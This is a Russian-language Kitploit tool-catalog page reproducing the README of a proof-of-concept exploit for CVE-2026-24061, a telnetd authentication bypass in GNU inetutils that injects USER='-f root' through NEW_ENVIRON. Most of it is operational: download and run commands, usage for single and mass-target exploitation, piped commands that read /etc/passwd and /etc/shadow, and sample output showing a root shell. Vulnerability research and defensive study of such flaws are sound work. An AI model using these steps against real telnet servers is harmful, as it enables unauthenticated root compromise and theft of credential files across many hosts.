Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — Доказательство концепции: CVE-2026-24061 — это критическая уязвимость обхода аутентификации в GNU inetutils-telnetd, позволяющая неаутентифицированным удалённым злоумышленникам мгновенно получить доступ к root-оболочке путём эксплуатации вредоносной опции telnet NEW_ENVIRON. | Kitploit
Инструменты/GitHubGitHub/sh4den/cve-2026-24061
Повышение привилегийАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеКомандование и УправлениеАутентификацияСтатьи и ИсследованияОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHub
61122 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
sh4den/cve-2026-24061

CVE-2026-24061

Доказательство концепции: CVE-2026-24061 — это критическая уязвимость обхода аутентификации в GNU inetutils-telnetd, позволяющая неаутентифицированным удалённым злоумышленникам мгновенно получить доступ к root-оболочке путём эксплуатации вредоносной опции telnet NEW_ENVIRON.

Репозиторий

CVE-2026-24061

GNU inetutils-telnetd — удалённый обход аутентификации

Инструмент для исследований в области безопасности, предназначенный для эксплуатации CVE-2026-24061 — критической уязвимости удалённого обхода аутентификации в GNU inetutils-telnetd, которая позволяет получить мгновенный доступ к root-оболочке без аутентификации.


Содержание

  • Сводка об уязвимости
  • Затронутые версии
  • Технический анализ
  • Предварительные требования
  • Установка
  • Использование
  • Справочник по выводу
  • Методология эксплуатации
  • Смягчение и устранение уязвимости
  • Индикаторы компрометации
  • Правовой отказ от ответственности
  • Ссылки
  • Авторы

Сводка об уязвимости

ПолеЗначение
Идентификатор CVECVE-2026-24061
Оценка CVSS v3.19.8 (Критический)
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Классификация CWECWE-88: Некорректная нейтрализация разделителей аргументов в команде
ПоставщикПроект GNU
Продуктinetutils-telnetd
Дата раскрытия20 января 2026 г.
Наличие исправленияБудет определено

Краткое резюме

Критическая уязвимость в GNU inetutils-telnetd до версии 2.7 включительно позволяет неаутентифицированным удалённым злоумышленникам полностью обойти аутентификацию и получить немедленный доступ к root-оболочке. Уязвимость эксплуатируется через telnet-опцию NEW_ENVIRON путём внедрения специально сформированной переменной окружения USER со значением "-f root", которая обходит все механизмы аутентификации.

Оценка воздействия

  • Конфиденциальность: Полная компрометация данных системы
  • Целостность: Полный контроль над системой с привилегиями root
  • Доступность: Возможен полный захват системы или отказ в обслуживании
  • Область действия: Без изменений — эксплуатация затрагивает только уязвимый telnet-сервис

Затронутые версии

Диапазон версийСтатус
<= 2.7Уязвима
> 2.7Статус исправления: будет определён

Технический анализ

Корневая причина уязвимости

Уязвимость возникает из-за некорректной проверки переменной окружения USER в обработчике опции NEW_ENVIRON в telnetd. При обработке telnet-опции NEW_ENVIRON служба telnetd не очищает значение переменной USER перед передачей его процессу login. Устанавливая USER в "-f root", злоумышленник внедряет аргументы командной строки, которые приводят к успешной аутентификации пользователя root без запроса учётных данных.

Вектор атаки

  1. Злоумышленник подключается к службе telnetd (обычно порт 23)
  2. Во время согласования telnet-опций сервер запрашивает данные NEW_ENVIRON
  3. Злоумышленник отвечает, устанавливая переменную окружения USER в "-f root"
  4. Вредоносный аргумент обходит проверки аутентификации
  5. Мгновенно предоставляется root-оболочка без запроса пароля
  6. Достигается полная компрометация системы

Сложность эксплуатации

  • Предварительные условия: Сетевой доступ к целевой службе telnetd
  • Аутентификация: Не требуется
  • Взаимодействие с пользователем: Отсутствует
  • Сложность атаки: Низкая

Предварительные требования

Системные требования

  • Python 3.7 или выше
  • Сетевое подключение к целевому экземпляру (экземплярам) telnetd
  • Достаточные права для выполнения Python-скриптов

Зависимости

Все зависимости входят в стандартную библиотеку Python:

ПакетНазначение
socketСетевое взаимодействие
selectМультиплексирование ввода/вывода
sysВзаимодействие с системой
osИнтерфейс операционной системы
threadingПараллельная эксплуатация целей
datetimeФорматирование временных меток

Установка

Способ 1: Использование Git

# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

Способ 2: Прямое скачивание

# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

Способ 3: Ручная установка

# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

Использование

Интерфейс командной строки

Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

Эксплуатация одиночной цели

Эксплуатация одного экземпляра telnetd:

# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

Режим выполнения команд

Выполнение команд в неинтерактивном режиме:

# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

Массовая эксплуатация целей

Эксплуатация нескольких целей из файла:

python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

Формат файла целей (targets.txt):

192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

Примечания:

  • Одна цель в строке
  • IP-адреса или имена хостов
  • Пустые строки игнорируются
  • Цели эксплуатируются параллельно с использованием потоков (threading)

Справочник по выводу

Индикаторы состояния

ИндикаторЦветОписание
[SUCCESS]ЗелёныйУспешное подключение к цели
[EXPLOIT]ЗелёныйЭксплуатационная нагрузка успешно отправлена
[INFO]СинийИнформационное сообщение о текущей операции
[ERROR]КрасныйОшибка подключения, тайм-аут или ошибка эксплуатации
[WARNING]ЖёлтыйПредупреждение (в настоящее время не используется)

Пример вывода

╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

Методология эксплуатации

Процесс согласования протокола Telnet

Эксплойт использует фазу согласования протокола Telnet:

Скачать инструмент